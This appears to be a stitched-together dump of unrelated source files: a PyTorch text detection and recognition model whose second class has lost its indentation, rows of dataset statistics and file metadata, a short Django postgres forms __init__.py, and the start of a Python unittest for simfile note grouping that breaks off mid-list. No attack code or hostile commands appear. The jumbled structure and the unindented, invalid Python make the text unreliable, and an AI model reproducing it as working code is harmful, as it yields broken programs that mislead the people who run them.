        self.conv8 = Conv2d(256, 256, (3,3), padding=1, bias=False)
        self.conv9 = Conv2d(256, 256, (3,3), padding=(1, 1), bias=False)
        self.conv10_s = Conv2d(256, 256, (2, 3), padding=(0, 1), bias=False)
        # 8400 output classes — presumably the recognition alphabet size.
        self.conv11 = Conv2d(256, 8400, (1, 1), padding=(0,0))
        self.batch5 = InstanceNorm2d(128, eps=1e-05, momentum=0.1, affine=True)
        # NOTE(review): batch6/batch8/batch9 are created but never used in
        # forward_ocr (only batch5/batch7/batch10_s are applied) — confirm
        # whether that is intentional.
        self.batch6 = InstanceNorm2d(128, eps=1e-05, momentum=0.1, affine=True)
        self.batch7 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
        self.batch8 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
        self.batch9 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
        self.batch10_s = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
        # Pools only the height dimension (keeps the text-line width).
        self.max2 = nn.MaxPool2d((2, 1), stride=(2,1))
        self.leaky = LeakyReLU(negative_slope=0.01, inplace=True)
        # Backbone stages; later stages use separable instance-norm blocks.
        self.layer1 = self._make_layer(BasicBlockIn, 64, 3, stride=1)
        self.inplanes = 64
        self.layer2 = self._make_layer(BasicBlockIn, 128, 4, stride=2)
        self.layer3 = self._make_layer(BasicBlockSepIn, 256, 6, stride=2)
        self.layer4 = self._make_layer(BasicBlockSepIn, 512, 4, stride=2)
        # Lateral 1x1 convs projecting each stage to 256 channels.
        self.feature4 = nn.Conv2d(512, 256, 1, stride=1, padding=0, bias=False)
        self.feature3 = nn.Conv2d(256, 256, 1, stride=1, padding=0, bias=False)
        self.feature2 = nn.Conv2d(128, 256, 1, stride=1, padding=0, bias=False)
        self.upconv2 = conv_dw_plain(256, 256, stride=1)
        self.upconv1 = conv_dw_plain(256, 256, stride=1)
        self.feature1 = nn.Conv2d(64, 256, 1, stride=1, padding=0, bias=False)
        # Detector heads: text/no-text, 4 box distances, (sin, cos) angle.
        self.act = Conv2d(256, 1, (1,1), padding=0, stride=1)
        self.rbox = Conv2d(256, 4, (1,1), padding=0, stride=1)
        self.angle = Conv2d(256, 2, (1,1), padding=0, stride=1)
        self.drop1 = Dropout2d(p=0.2, inplace=False)
        # NOTE(review): reduction='elementwise_mean' was removed in modern
        # PyTorch (>=1.0 deprecates it in favour of 'mean') — these lines
        # raise ValueError on current releases; confirm the pinned version.
        self.angle_loss = nn.MSELoss(reduction='elementwise_mean')
        self.h_loss = nn.SmoothL1Loss(reduction='elementwise_mean')
        self.w_loss = nn.SmoothL1Loss(reduction='elementwise_mean')
        self.attention = attention
        if self.attention:
            self.conv_attenton = nn.Conv2d(256, 1, kernel_size=1, stride=1, padding=0, bias=True)
        self.multi_scale = multi_scale

    def _make_layer(self, block, planes, blocks, stride=1):
        """Stack ``blocks`` residual blocks; the first may downsample."""
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            # Projection shortcut when shape or channel count changes.
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes))
        return nn.Sequential(*layers)

    def forward_ocr(self, x):
        """Recognition head: feature map -> per-column log-probabilities.

        Returns a tensor of shape (N, 8400, W') after LogSoftmax over the
        class dimension.
        """
        x = self.conv5(x)
        x = self.batch5(x)
        x = self.leaky(x)
        # conv6/conv8/conv9 are each applied twice — weight sharing between
        # consecutive layers; appears intentional but confirm upstream.
        x = self.conv6(x)
        x = self.leaky(x)
        x = self.conv6(x)
        x = self.leaky(x)
        x = self.max2(x)
        x = self.conv7(x)
        x = self.batch7(x)
        x = self.leaky(x)
        x = self.conv8(x)
        x = self.leaky(x)
        x = self.conv8(x)
        x = self.leaky(x)
        x = self.conv9(x)
        x = self.leaky(x)
        x = self.conv9(x)
        x = self.leaky(x)
        x = self.max2(x)
        x = self.conv10_s(x)
        x = self.batch10_s(x)
        x = self.leaky(x)
        x = self.drop1(x)
        x = self.conv11(x)
        # Collapse the (now size-1) height dim, put width before classes for
        # the softmax, then restore (N, classes, W).
        x = x.squeeze(2)
        x = x.permute(0,2,1)
        y = x
        x = x.contiguous().view(-1,x.data.shape[2])
        x = LogSoftmax(len(x.size()) - 1)(x)
        x = x.view_as(y)
        x = x.permute(0,2,1)
        return x

    def forward_features(self, x):
        """Run only the shared stem; returns the 64-channel stem output."""
        x = self.layer0(x)
        focr = self.layer0_1(x)
        return focr

    def forward(self, x):
        """Detector pass.

        Returns ([segm_pred, segm_pred2], [rbox, rbox2], [angle, angle2], x)
        where the "2" tensors come from the half-resolution decoder level
        and ``x`` is the final 256-channel feature map.
        """
        x = self.layer0(x)
        x = self.layer0_1(x)
        x = self.drop1(x)
        su3 = self.layer1(x)
        features1 = self.feature1(su3)
        su2 = self.layer2(su3)
        features2 = self.feature2(su2)
        su1 = self.layer3(su2)
        features3 = self.feature3(su1)
        x = self.layer4(su1)
        x = self.drop1(x)
        features4 = self.feature4(x)
        if self.attention:
            # Sigmoid gate computed at the coarser level, upsampled and used
            # to weight the finer lateral features.
            att = self.conv_attenton(features4)
            att = torch.sigmoid(att)
            att = att.expand_as(features4)
            att_up = F.interpolate(att, size=(features3.size(2), features3.size(3)), mode='bilinear', align_corners=True)
        # Top-down pathway: upsample, add lateral, smooth with upconv.
        x = F.interpolate(features4, size=(features3.size(2), features3.size(3)), mode='bilinear', align_corners=True)
        if self.attention:
            x = x + features3 * att_up
            att = self.conv_attenton(x)
            att = torch.sigmoid(att)
            att_up = F.interpolate(att, size=(features2.size(2), features2.size(3)), mode='bilinear', align_corners=True)
        else:
            x = x + features3
        x = F.interpolate(x, size=(features2.size(2), features2.size(3)), mode='bilinear', align_corners=True)
        x = self.upconv1(x)
        if self.attention:
            features2 = x + features2 * att_up
            att = self.conv_attenton(features2)
            att = torch.sigmoid(att)
            att_up = F.interpolate(att, size=(features1.size(2), features1.size(3)), mode='bilinear', align_corners=True)
        else:
            features2 = x + features2
        x = features2
        x = F.interpolate(x, size=(features1.size(2), features1.size(3)), mode='bilinear', align_corners=True)
        x = self.upconv2(x)
        if self.attention:
            x = x + features1 * att_up
        else:
            x += features1
        # Auxiliary half-resolution head on features2.
        segm_pred2 = torch.sigmoid(self.act(features2))
        rbox2 = torch.sigmoid(self.rbox(features2)) * 128
        angle2 = torch.sigmoid(self.angle(features2)) * 2 - 1
        # Normalize (sin, cos) to the unit circle.
        angle_den = torch.sqrt(angle2[:, 0, :, :] * angle2[:, 0, :, :] + angle2[:, 1, :, :] * angle2[:, 1, :, :]).unsqueeze(1)
        angle_den = angle_den.expand_as(angle2)
        angle2 = angle2 / angle_den
        # Main full-resolution head.
        x = self.drop1(x)
        segm_pred = torch.sigmoid(self.act(x))
        rbox = torch.sigmoid(self.rbox(x)) * 128
        angle = torch.sigmoid(self.angle(x)) * 2 - 1
        angle_den = torch.sqrt(angle[:, 0, :, :] * angle[:, 0, :, :] + angle[:, 1, :, :] * angle[:, 1, :, :]).unsqueeze(1)
        angle_den = angle_den.expand_as(angle)
        angle = angle / angle_den
        return [segm_pred, segm_pred2], [rbox, rbox2], [angle, angle2], x

    def loss(self, segm_preds, segm_gt, iou_mask, angle_preds, angle_gt, roi_pred, roi_gt):
        """Combined detection loss: dice segmentation + angle MSE + box IoU.

        Requires CUDA (the accumulators are moved with ``.cuda()``).
        ``iou_loss`` accumulates into ``self.box_loss_value`` in place.
        """
        # .cuda() makes these non-leaf, so the in-place += below is legal.
        self.box_loss_value = torch.tensor(0.0, requires_grad = True).cuda()
        self.angle_loss_value = torch.tensor(0.0, requires_grad = True).cuda()
        segm_pred = segm_preds[0].squeeze(1)
        angle_pred = angle_preds[0]
        self.segm_loss_value = dice_loss(segm_pred * iou_mask , segm_gt * iou_mask )
        segm_pred1 = segm_preds[1].squeeze(1)
        if self.multi_scale:
            # Downsample ground truth/masks to the auxiliary head's scale.
            iou_gts = F.interpolate(segm_gt.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
            iou_masks = F.interpolate(iou_mask.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
            self.segm_loss_value += dice_loss(segm_pred1 * iou_masks, iou_gts * iou_masks )
        byte_mask = torch.gt(segm_gt, 0.5)
        if byte_mask.sum() > 0:
            # Angle supervision as (sin, cos) regression on positive pixels.
            gt_sin = torch.sin(angle_gt[byte_mask])
            gt_cos = torch.cos(angle_gt[byte_mask])
            sin_val = self.angle_loss(angle_pred[:, 0, :, :][byte_mask], gt_sin)
            cos_val = self.angle_loss(angle_pred[:, 1, :, :][byte_mask], gt_cos)
            self.angle_loss_value += sin_val
            self.angle_loss_value += cos_val
            iou_loss(roi_gt, byte_mask, roi_pred[0], self.box_loss_value)
        if self.multi_scale:
            byte_mask = torch.gt(F.interpolate(segm_gt.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True), 0.5).squeeze(1)
            if byte_mask.sum() > 0:
                angle_gts = F.interpolate(angle_gt.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
                gt_sin = torch.sin(angle_gts[byte_mask])
                gt_cos = torch.cos(angle_gts[byte_mask])
                sin_val = self.angle_loss(angle_preds[1][:, 0, :, :][byte_mask], gt_sin)
                self.angle_loss_value += sin_val
                self.angle_loss_value += self.angle_loss(angle_preds[1][:, 1, :, :][byte_mask], gt_cos)
                # Box distances are halved to match the half-resolution head.
                roi_gt_s = F.interpolate(roi_gt.permute(0, 3, 1, 2), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True) / 2
                roi_gt_s = roi_gt_s.permute(0, 2, 3, 1)
                iou_loss(roi_gt_s, byte_mask, roi_pred[1], self.box_loss_value)
        return self.segm_loss_value + self.angle_loss_value * 2 + 0.5 * self.box_loss_value
class ModelMLTRCTW(nn.Module):
def recompute(self):
self.layer0[0].recompute_weights()
self.layer0[2].recompute_weights()
self.layer0_1[0].recompute_weights()
self.layer0_1[2].recompute_weights()
def __init__(self, attention = False, multi_scale = True):
super(ModelMLTRCTW, self).__init__()
self.inplanes = 64
self.layer0 = nn.Sequential(
Conv2d(3, 16, 3, stride=1, padding=1, bias=False),
CReLU_IN(16),
Conv2d(32, 32, 3, stride=2, padding=1, bias=False),
CReLU_IN(32)
)
self.layer0_1 = nn.Sequential(
Conv2d(64, 64, 3, stride=1, padding=1, bias=False),
#nn.InstanceNorm2d(64, affine=True),
nn.ReLU(),
Conv2d(64, 64, 3, stride=2, padding=1, bias=False),
#nn.InstanceNorm2d(64, affine=True),
nn.ReLU(inplace=True)
)
self.conv5 = Conv2d(64, 128, (3,3), padding=(1, 1), bias=False)
self.conv6 = Conv2d(128, 128, (3,3), padding=1, bias=False)
self.conv7 = Conv2d(128,256, 3, padding=1, bias=False)
self.conv8 = Conv2d(256, 256, (3,3), padding=1, bias=False)
self.conv9 = Conv2d(256, 256, (3,3), padding=(1, 1), bias=False)
self.conv10_s = Conv2d(256, 256, (2, 3), padding=(0, 1), bias=False)
self.conv11 = Conv2d(256, 8400, (1, 1), padding=(0,0))
self.batch5 = InstanceNorm2d(128, eps=1e-05, momentum=0.1, affine=True)
self.batch6 = InstanceNorm2d(128, eps=1e-05, momentum=0.1, affine=True)
self.batch7 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.batch8 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.batch9 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.batch10_s = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.max2 = nn.MaxPool2d((2, 1), stride=(2,1))
self.leaky = LeakyReLU(negative_slope=0.01, inplace=True)
self.layer1 = self._make_layer(BasicBlockIn, 64, 3, stride=1)
self.inplanes = 64
self.layer2 = self._make_layer(BasicBlockIn, 128, 4, stride=2)
self.layer3 = self._make_layer(BasicBlockSepIn, 256, 6, stride=2)
self.layer4 = self._make_layer(BasicBlockSepIn, 512, 4, stride=2)
self.feature4 = nn.Conv2d(512, 256, 1, stride=1, padding=0, bias=False)
self.feature3 = nn.Conv2d(256, 256, 1, stride=1, padding=0, bias=False)
self.feature2 = nn.Conv2d(128, 256, 1, stride=1, padding=0, bias=False)
self.upconv2 = conv_dw_plain(256, 256, stride=1)
self.upconv1 = conv_dw_plain(256, 256, stride=1)
self.feature1 = nn.Conv2d(64, 256, 1, stride=1, padding=0, bias=False)
self.act = Conv2d(256, 1, (1,1), padding=0, stride=1)
self.rbox = Conv2d(256, 4, (1,1), padding=0, stride=1)
self.angle = Conv2d(256, 2, (1,1), padding=0, stride=1)
self.drop1 = Dropout2d(p=0.2, inplace=False)
self.angle_loss = nn.MSELoss(reduction='elementwise_mean')
self.h_loss = nn.SmoothL1Loss(reduction='elementwise_mean')
self.w_loss = nn.SmoothL1Loss(reduction='elementwise_mean')
self.attention = attention
if self.attention:
self.conv_attenton = nn.Conv2d(256, 1, kernel_size=1, stride=1, padding=0, bias=True)
self.multi_scale = multi_scale
def copy_ocr(self):
import copy
self.layer0o = copy.deepcopy(self.layer0)
self.layer0_1o = copy.deepcopy(self.layer0_1)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward_ocr(self, x):
x = self.conv5(x)
x = self.batch5(x)
x = self.leaky(x)
x = self.conv6(x)
x = self.leaky(x)
x = self.conv6(x)
x = self.leaky(x)
x = self.max2(x)
x = self.conv7(x)
x = self.batch7(x)
x = self.leaky(x)
x = self.conv8(x)
x = self.leaky(x)
x = self.conv8(x)
x = self.leaky(x)
x = self.conv9(x)
x = self.leaky(x)
x = self.conv9(x)
x = self.leaky(x)
x = self.max2(x)
x = self.conv10_s(x)
x = self.batch10_s(x)
x = self.leaky(x)
x = self.drop1(x)
x = self.conv11(x)
x = x.squeeze(2)
x = x.permute(0,2,1)
y = x
x = x.contiguous().view(-1,x.data.shape[2])
x = LogSoftmax(len(x.size()) - 1)(x)
x = x.view_as(y)
x = x.permute(0,2,1)
return x
def forward_features(self, x):
x = self.layer0(x)
x = self.layer0_1(x)
return x
def forward(self, x):
x = self.layer0(x)
x = self.layer0_1(x)
x = self.drop1(x)
su3 = self.layer1(x)
features1 = self.feature1(su3)
su2 = self.layer2(su3)
features2 = self.feature2(su2)
su1 = self.layer3(su2)
features3 = self.feature3(su1)
x = self.layer4(su1)
x = self.drop1(x)
features4 = self.feature4(x)
if self.attention:
att = self.conv_attenton(features4)
att = torch.sigmoid(att)
att = att.expand_as(features4)
att_up = F.interpolate(att, size=(features3.size(2), features3.size(3)), mode='bilinear', align_corners=True)
x = F.interpolate(features4, size=(features3.size(2), features3.size(3)), mode='bilinear', align_corners=True)
if self.attention:
x = x + features3 * att_up
att = self.conv_attenton(x)
att = torch.sigmoid(att)
att_up = F.interpolate(att, size=(features2.size(2), features2.size(3)), mode='bilinear', align_corners=True)
else:
x = x + features3
x = F.interpolate(x, size=(features2.size(2), features2.size(3)), mode='bilinear', align_corners=True)
x = self.upconv1(x)
if self.attention:
features2 = x + features2 * att_up
att = self.conv_attenton(features2)
att = torch.sigmoid(att)
att_up = F.interpolate(att, size=(features1.size(2), features1.size(3)), mode='bilinear', align_corners=True)
else:
features2 = x + features2
x = features2
x = F.interpolate(x, size=(features1.size(2), features1.size(3)), mode='bilinear', align_corners=True)
x = self.upconv2(x)
if self.attention:
x = x + features1 * att_up
else:
x += features1
segm_pred2 = torch.sigmoid(self.act(features2))
rbox2 = torch.sigmoid(self.rbox(features2)) * 128
angle2 = torch.sigmoid(self.angle(features2)) * 2 - 1
angle_den = torch.sqrt(angle2[:, 0, :, :] * angle2[:, 0, :, :] + angle2[:, 1, :, :] * angle2[:, 1, :, :]).unsqueeze(1)
angle_den = angle_den.expand_as(angle2)
angle2 = angle2 / angle_den
x = self.drop1(x)
segm_pred = torch.sigmoid(self.act(x))
rbox = torch.sigmoid(self.rbox(x)) * 128
angle = torch.sigmoid(self.angle(x)) * 2 - 1
angle_den = torch.sqrt(angle[:, 0, :, :] * angle[:, 0, :, :] + angle[:, 1, :, :] * angle[:, 1, :, :]).unsqueeze(1)
angle_den = angle_den.expand_as(angle)
angle = angle / angle_den
return [segm_pred, segm_pred2], [rbox, rbox2], [angle, angle2], x
def loss(self, segm_preds, segm_gt, iou_mask, angle_preds, angle_gt, roi_pred, roi_gt):
    """Compute the total detection loss as a stacked 3-vector.

    Accumulates three components onto the instance:
      - ``self.iou_loss_value``:   dice loss on the segmentation maps,
      - ``self.angle_loss_value``: sin/cos regression loss on text angles,
      - ``self.box_loss_value``:   IoU loss on the rbox geometry
        (filled in-place by the module-level ``iou_loss`` helper).

    ``segm_preds``/``angle_preds`` are two-element lists (full scale and
    half scale); the half-scale terms are only added when
    ``self.multi_scale`` is set.  Returns
    ``torch.stack((iou, angle, box))``.
    """
    # NOTE(review): .cuda() on a requires_grad leaf returns a non-leaf
    # copy; gradients flow but the original CPU leaf is discarded —
    # presumably intentional here, verify against the training loop.
    self.box_loss_value = torch.tensor(0.0, requires_grad = True).cuda()
    self.angle_loss_value = torch.tensor(0.0, requires_grad = True).cuda()
    # Full-scale predictions: drop the singleton channel dim for dice.
    segm_pred = segm_preds[0].squeeze(1)
    angle_pred = angle_preds[0]
    # iou_mask zeroes out don't-care regions in both pred and gt.
    self.iou_loss_value = dice_loss(segm_pred * iou_mask , segm_gt * iou_mask )
    segm_pred1 = segm_preds[1].squeeze(1)
    if self.multi_scale:
        # Resample gt/mask down to the half-scale prediction's size.
        iou_gts = F.interpolate(segm_gt.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
        iou_masks = F.interpolate(iou_mask.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
        self.iou_loss_value += dice_loss(segm_pred1 * iou_masks, iou_gts * iou_masks )
    # Angle/box losses are evaluated only on positive (text) pixels.
    masked_segm = segm_gt.data
    byte_mask = torch.gt(masked_segm, 0.5)
    if byte_mask.sum() > 0:
        # Regress sin/cos of the gt angle separately on masked pixels.
        gt_sin = torch.sin(angle_gt[byte_mask])
        gt_cos = torch.cos(angle_gt[byte_mask])
        sin_val = self.angle_loss(angle_pred[:, 0, :, :][byte_mask], gt_sin)
        cos_val = self.angle_loss(angle_pred[:, 1, :, :][byte_mask], gt_cos)
        # Guard against NaNs so one bad batch can't poison the loss.
        if not np.isnan(sin_val.data.cpu().numpy()):
            self.angle_loss_value += sin_val
        if not np.isnan(cos_val.data.cpu().numpy()):
            self.angle_loss_value += cos_val
        # iou_loss accumulates into self.box_loss_value in place.
        iou_loss(roi_gt, byte_mask, roi_pred[0], self.box_loss_value)
    if self.multi_scale:
        # Half-scale positive mask derived by resampling the gt mask.
        byte_mask = torch.gt(F.interpolate(masked_segm.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True), 0.5).squeeze(1)
        if byte_mask.sum() > 0:
            angle_gts = F.interpolate(angle_gt.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
            gt_sin = torch.sin(angle_gts[byte_mask])
            gt_cos = torch.cos(angle_gts[byte_mask])
            sin_val = self.angle_loss(angle_preds[1][:, 0, :, :][byte_mask], gt_sin)
            if not np.isnan(sin_val.data.cpu().numpy()):
                self.angle_loss_value += sin_val
            cos_val = self.angle_loss(angle_preds[1][:, 1, :, :][byte_mask], gt_cos)
            if not np.isnan(cos_val.data.cpu().numpy()):
                self.angle_loss_value += cos_val
            # NOTE(review): roi_gt is divided by 2 both here and again
            # two lines below — looks like an accidental double halving;
            # confirm against the scale convention of roi_pred[1].
            roi_gt_s = F.interpolate(roi_gt.permute(0, 3, 1, 2), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True) / 2
            roi_gt_s = roi_gt_s.permute(0, 2, 3, 1)
            roi_gt_s = roi_gt_s / 2
            iou_loss(roi_gt_s, byte_mask, roi_pred[1], self.box_loss_value)
    return torch.stack( (self.iou_loss_value, self.angle_loss_value, self.box_loss_value) )
| 34.795039
| 169
| 0.631749
| 4,030
| 26,653
| 4.018114
| 0.059801
| 0.010128
| 0.021861
| 0.032607
| 0.883345
| 0.873093
| 0.864942
| 0.859137
| 0.842525
| 0.836287
| 0
| 0.063781
| 0.216448
| 26,653
| 765
| 170
| 34.840523
| 0.711597
| 0.007466
| 0
| 0.784211
| 0
| 0
| 0.010286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057895
| false
| 0
| 0.012281
| 0.012281
| 0.126316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9158f1e7cc0e15dbe063889fd076849a0fe8e5ff
| 118
|
py
|
Python
|
venv/lib/python3.6/site-packages/django/contrib/postgres/forms/__init__.py
|
xiegudong45/typeidea
|
db6504a232d120d6ffa185730bd35b9b9ecffa6c
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
checkerista/.env/Lib/site-packages/django/contrib/postgres/forms/__init__.py
|
LybaFatimaNasir/CS311S20PID02
|
bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39
|
[
"MIT"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
checkerista/.env/Lib/site-packages/django/contrib/postgres/forms/__init__.py
|
LybaFatimaNasir/CS311S20PID02
|
bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39
|
[
"MIT"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
from .array import * # NOQA
from .hstore import * # NOQA
from .jsonb import * # NOQA
from .ranges import * # NOQA
| 23.6
| 29
| 0.661017
| 16
| 118
| 4.875
| 0.4375
| 0.512821
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.237288
| 118
| 4
| 30
| 29.5
| 0.866667
| 0.161017
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
916448fcf1b92bd11dde344e0c57d11f2b1fe248
| 14,524
|
py
|
Python
|
simfile/notes/tests/test_group.py
|
garcia/simfile
|
4e15660c964d8d3c0e6d1f69431138e7eb4db288
|
[
"MIT"
] | 22
|
2017-04-24T05:37:13.000Z
|
2022-03-08T00:41:37.000Z
|
simfile/notes/tests/test_group.py
|
garcia/simfile
|
4e15660c964d8d3c0e6d1f69431138e7eb4db288
|
[
"MIT"
] | 10
|
2021-05-31T01:21:56.000Z
|
2022-03-17T04:26:54.000Z
|
simfile/notes/tests/test_group.py
|
garcia/simfile
|
4e15660c964d8d3c0e6d1f69431138e7eb4db288
|
[
"MIT"
] | 3
|
2019-06-05T15:23:53.000Z
|
2021-09-11T02:39:36.000Z
|
import unittest
from .. import Note, NoteType, NoteData
from ..group import *
from ...timing import Beat
def testing_valid_notes():
    """Return a NoteData fixture of 5 measures of valid 4-column note data.

    Every hold (2) and roll (4) head has a matching tail (3), so grouping
    with join_heads_to_tails must succeed on this chart.
    """
    return NoteData(
        '1200\n'
        '0010\n'
        '0001\n'
        '0010\n'
        ',\n'
        '1300\n'
        '0001\n'
        '4004\n'
        '0010\n'
        ',\n'
        '3000\n'
        '1000\n'
        '0003\n'
        '0001\n'
        ',\n'
        '2000\n'
        '0200\n'
        '0010\n'
        '0001\n'
        ',\n'
        '0310\n'
        '0001\n'
        '3010\n'
        '1001\n'
    )
def testing_invalid_notes():
    """Return a NoteData fixture with orphaned heads and tails.

    Contains tails (3) with no preceding head and heads (2/4) with no
    following tail, used to exercise the orphaned-note handling paths.
    """
    return NoteData(
        '3000\n'
        '0200\n'
        '0200\n'
        '0304\n'
        ',\n'
        '2000\n'
        '1000\n'
        '3000\n'
        '0020\n'
    )
class TestGroupNotes(unittest.TestCase):
    """Tests for group_notes over valid and invalid (orphaned) charts."""

    def test_default_configuration(self):
        # Default: every note lands in its own single-element group.
        grouped_notes = list(group_notes(testing_valid_notes()))
        self.assertListEqual([
            [Note(beat=Beat(0), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(0), column=1, note_type=NoteType.HOLD_HEAD)],
            [Note(beat=Beat(1), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(2), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(3), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(4), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(4), column=1, note_type=NoteType.TAIL)],
            [Note(beat=Beat(5), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(6), column=0, note_type=NoteType.ROLL_HEAD)],
            [Note(beat=Beat(6), column=3, note_type=NoteType.ROLL_HEAD)],
            [Note(beat=Beat(7), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(8), column=0, note_type=NoteType.TAIL)],
            [Note(beat=Beat(9), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(10), column=3, note_type=NoteType.TAIL)],
            [Note(beat=Beat(11), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(12), column=0, note_type=NoteType.HOLD_HEAD)],
            [Note(beat=Beat(13), column=1, note_type=NoteType.HOLD_HEAD)],
            [Note(beat=Beat(14), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(15), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(16), column=1, note_type=NoteType.TAIL)],
            [Note(beat=Beat(16), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(17), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(18), column=0, note_type=NoteType.TAIL)],
            [Note(beat=Beat(18), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(19), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(19), column=3, note_type=NoteType.TAP)],
        ], grouped_notes)

    def test_join_heads_to_tails(self):
        # Heads absorb their tails into NoteWithTail; tails disappear.
        grouped_notes = list(group_notes(
            testing_valid_notes(),
            join_heads_to_tails=True,
        ))
        self.assertListEqual([
            [Note(beat=Beat(0), column=0, note_type=NoteType.TAP)],
            [NoteWithTail(beat=Beat(0), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(4))],
            [Note(beat=Beat(1), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(2), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(3), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(4), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(5), column=3, note_type=NoteType.TAP)],
            [NoteWithTail(beat=Beat(6), column=0, note_type=NoteType.ROLL_HEAD, tail_beat=Beat(8))],
            [NoteWithTail(beat=Beat(6), column=3, note_type=NoteType.ROLL_HEAD, tail_beat=Beat(10))],
            [Note(beat=Beat(7), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(9), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(11), column=3, note_type=NoteType.TAP)],
            [NoteWithTail(beat=Beat(12), column=0, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(18))],
            [NoteWithTail(beat=Beat(13), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(16))],
            [Note(beat=Beat(14), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(15), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(16), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(17), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(18), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(19), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(19), column=3, note_type=NoteType.TAP)],
        ], grouped_notes)

    def test_same_beat_notes_join_all(self):
        # JOIN_ALL: every note on the same beat shares one group.
        grouped_notes = list(group_notes(
            testing_valid_notes(),
            same_beat_notes=SameBeatNotes.JOIN_ALL,
        ))
        self.assertListEqual([
            [
                Note(beat=Beat(0), column=0, note_type=NoteType.TAP),
                Note(beat=Beat(0), column=1, note_type=NoteType.HOLD_HEAD),
            ],
            [Note(beat=Beat(1), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(2), column=3, note_type=NoteType.TAP)],
